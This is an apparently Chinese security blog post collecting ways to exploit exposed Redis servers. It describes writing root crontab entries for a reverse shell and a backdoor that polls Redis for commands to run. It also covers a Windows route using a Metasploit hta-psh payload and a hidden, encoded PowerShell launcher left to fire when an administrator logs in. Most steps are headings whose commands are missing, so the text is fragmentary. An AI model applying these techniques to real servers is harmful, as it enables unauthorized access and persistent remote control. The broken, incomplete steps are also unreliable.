WEB安全

redis利用姿势收集

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;

测试环境:CentOS,RHEL

# 利用crontab反弹shell

# 利用crontab创建文件 /tmp/888

# 二次改写crontab

# 利用第一步的写crontab步骤,完成下面的命令

控制 /var/spool/cron/root 和 /tmp/zz

# 最终实现,每10秒从redis的c变量读入要执行的命令,再将执行结果写入变量r

windows利用方式(转自90sec)

redis 官方未发布windows版本,但是野外存在redis/win版本。

在测试时发现一windows版本redis,遂开始搞。

直接上利用,基于msf:

hta-psh.txt 对一些字符串进行变通,如不,在写入时会导致字符串丢失。

修改1.ps1,文件内容大概如下:

$command=”powershell -nop -w hidden -e xxxxxxxxxxxxxxxx”;iex $command;$command2=”taskkill /im mshta.exe”;iex $command2;

最后写入文件,等待管理员登陆

 

(0)

本文由 安全周 作者:SecJack 发表,转载请注明来源!

关键词:

热评文章

发表评论